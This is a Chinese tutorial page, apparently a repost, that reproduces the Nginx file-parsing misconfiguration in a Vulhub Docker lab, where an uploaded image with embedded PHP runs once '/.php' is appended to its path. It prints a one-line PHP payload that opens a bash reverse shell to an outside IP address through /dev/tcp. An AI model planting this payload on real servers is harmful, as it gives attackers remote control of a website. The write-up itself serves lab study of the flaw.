网站首页 > 技术教程 正文
该漏洞与Nginx、php版本无关,属于用户配置不当造成的解析漏洞。[1] 在访问的图片路径后面,添加/.php,一个不存在的php文件,就能执行图片马里面的php代码。 图片马,针对的是网站管理员配置不当,黑客通过一张图片就能拿下一个网站。
ailx10
网络安全优秀回答者
网络安全硕士
去咨询
前提:准备好docker环境,下载好vulhub,进入目录 ,开始复现漏洞
- docker-compose build //可选
- docker-compose up -d
完成试验后,记得删除漏洞环境哦~~
- docker-compose down
- docker system prune -a -f //可选
简单访问一下,说明Vulhub的Nginx 解析漏洞环境搭建成功了
发现只能上传图片
直接访问:http://144.34.162.13/uploadfiles/nginx.png
再访问一下:http://144.34.162.13/uploadfiles/nginx.png/1.php
下载下来这张图片,然后上传,掏出burpsuite进行重放,修改图片马里面的php代码。
<?php system("bash -c 'bash -i &>/dev/tcp/174.137.58.6/8888 0>&1'");?>
再通过burpsuite访问这个图片的路径,尽管504错误,但是
反弹shell成功了
参考
- ^Nginx 解析漏洞复现 https://vulhub.org/#/environments/nginx/nginx_parsing_vulnerability/
猜你喜欢
- 2024-09-28 Nginx 的软件负载均衡详解(用nginx可以实现软件负载均衡)
- 2024-09-28 Nginx-详解其原理(nginx工作原理及配置文件的参数使用)
- 2024-09-28 二级域名如何解析(二级域名如何解析到服务器)
- 2024-09-28 详细解析Nginx的功能和应用场景:正代、反向代理...
- 2024-09-28 「云原生」K8s Ingress rewrite与TCP四层转发讲解与实战操作
你 发表评论:
欢迎- 最近发表
-
- Win10 TH2正式版官方ESD映像转换ISO镜像方法详解
- 使用iso镜像升级到Windows 10的步骤
- macOS Ventura 13.2 (22D49) Boot ISO 原版可引导镜像
- 安利一个用ISO镜像文件制作引导U盘的的小工具RUFUS
- CentOS 7使用ISO镜像配置本地yum源
- 用于x86平台的安卓9.0 ISO镜像发布下载:通吃I/A/N、完全免费
- AlmaLinux 9.6发布:升级工具、初步支持IBM Power虚拟化技术
- Rufus写入工具简洁介绍与教程(写入模式)
- 新硬件也能安装使用了,Edge版Linux Mint 21.3镜像发布
- 开源工程师:Ubuntu应该抛弃32位ISO镜像
- 标签列表
-
- 下划线是什么 (87)
- 精美网站 (58)
- qq登录界面 (90)
- nginx 命令 (82)
- nginx .http (73)
- nginx lua (70)
- nginx 重定向 (68)
- Nginx超时 (65)
- nginx 监控 (57)
- odbc (59)
- rar密码破解工具 (62)
- annotation (71)
- 红黑树 (57)
- 智力题 (62)
- php空间申请 (61)
- 按键精灵 注册码 (69)
- 软件测试报告 (59)
- ntcreatefile (64)
- 闪动文字 (56)
- guid (66)
- abap (63)
- mpeg 2 (65)
- column (63)
- dreamweaver教程 (57)
- excel行列转换 (56)
本文暂时没有评论,来添加一个吧(●'◡'●)